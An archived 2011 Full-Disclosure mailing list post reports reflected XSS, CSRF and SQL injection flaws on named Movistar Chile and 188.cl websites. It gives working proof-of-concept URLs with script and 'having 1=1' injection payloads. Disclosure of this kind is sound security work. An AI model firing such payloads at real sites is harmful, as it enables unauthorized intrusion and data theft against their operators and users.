lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite for Android: free password hash cracker in your pocket
[<prev] [next>] [<thread-prev] [day] [month] [year] [list]
Message-ID: <4DB788BE.1020309@mitm.cl>
Date: Wed, 27 Apr 2011 00:08:46 -0300
From: ksha <ksha@...m.cl>
To: full-disclosure@...ts.grok.org.uk
Subject:  Multiple XSS+XSRF found at Movistar Chile


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1


Status: reported
Discovered: April 25, 2011, 9:32 p.m.

XSS:
http://www.movistar.cl/PortalMovistarWeb/appmanager/Porta%3Cscript%3Ealert(/xss/)%3C/script%3EalMovistar/portal?_nfpb=true&_pageLabel
<http://www.movistar.cl/PortalMovistarWeb/appmanager/Porta%3Cscript%3Ealert%28/xss/%29%3C/script%3EalMovistar/portal?_nfpb=true&_pageLabel>
reported on: http://secureless.org/v/1357/

XSS:
http://www.movistar.cl/PortalMovistarWeb/appmanager/PortalMovistar/portal?_nfpb=true&_pageLabel=P12200150661236808023656&q=%22;%3C/script%3E%3Cscript%3Ealert(/xss/)%3C/script%3E
<http://www.movistar.cl/PortalMovistarWeb/appmanager/PortalMovistar/portal?_nfpb=true&_pageLabel=P12200150661236808023656&q=%22;%3C/script%3E%3Cscript%3Ealert%28/xss/%29%3C/script%3E>
Reported on: http://secureless.org/v/1360/

XSRF (CSRF):
<form
action=?http://www.movistar.cl/PortalMovistarWeb/appmanager/PortalMovistar/portal?_nfpb=true&_pageLabel=P12200150661236808023656?
id=?cse-search-box? method=?post? style=?margin-top: 7px;
margin-right: 2px?>
<div><input id=?idsearch? type=?text? name=?q? size=?31?/>
<a
href=?http://www.movistar.cl/PortalMovistarWeb/appmanager/PortalMovistar/portal?_nfpb=true&_pageLabel=P12200150661236808023656&q=aaaaaaa%22;%20asasasasa#?
id=?btn_buscadorMovistar? target=?_parent?>a</a></div>
</form>
Reported on: http://secureless.org/v/1361/

XSRF (CSRF):
https://www.mcloud.cl/cp/ps/Main/login/Authenticate

<input onclick="restoreUser(this)" name="usuario"
value="usuario@...istar.cl" maxlength="255" type="text"></p>
<input id="password" onclick="this.value=''" name="password"
value="Clave" maxlength="255" onkeypress="validarEnter(event);"
onfocus="cambiaFoco('s')" onblur="cambiaFoco('n')" type="password"></p>
<p class="button"><a href="javascript:login()"><span style="font-size:
12px; color: rgb(255, 255, 255); font-family: Arial;">Entrar</span></a>
Reported on: http://secureless.org/v/1358/

SQL Injection:
http://www.188.cl/?area=%27having%201=1?
<http://www.188.cl/?area=%27having%201=1-->

Reported on: http://secureless.org/v/1359/

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.11 (GNU/Linux)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/

iQEcBAEBAgAGBQJNt4i+AAoJEP64MfdRn+k8QG4H/1rQlYYGKdohOi/Gtg0QgK39
U/05s0p6k8yL8Qu0qeZ+b+WFR+hiZULQ4Jm18Jg9IH+brVmVOK5ec+ZnANajxxw/
M3OMs3TsAOg8AsIbdJHJKo3BSr+8aN/7ur4tOJJV9EnzBijsH1d6ieGMsJq5sPNz
4K+UPdBLEKc31HpaF+PHsBNEZ45bVmTUbctHnYPhF57lUTh0Zi/S8NIcjxjc4V+8
URw6aEmE6aNclaWREcseWzgDvDOMisHSav0c7Y9DI9W4yk8QDqx7+FJk+w500UAK
uBJ4oXvX5FyQZkrRwSsIcSC3Ptl/Ipvno09IEC+O6t5hTMPF+B1SsH0fXcKPBFM=
=8B6S
-----END PGP SIGNATURE-----


Content of type "text/html" skipped

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ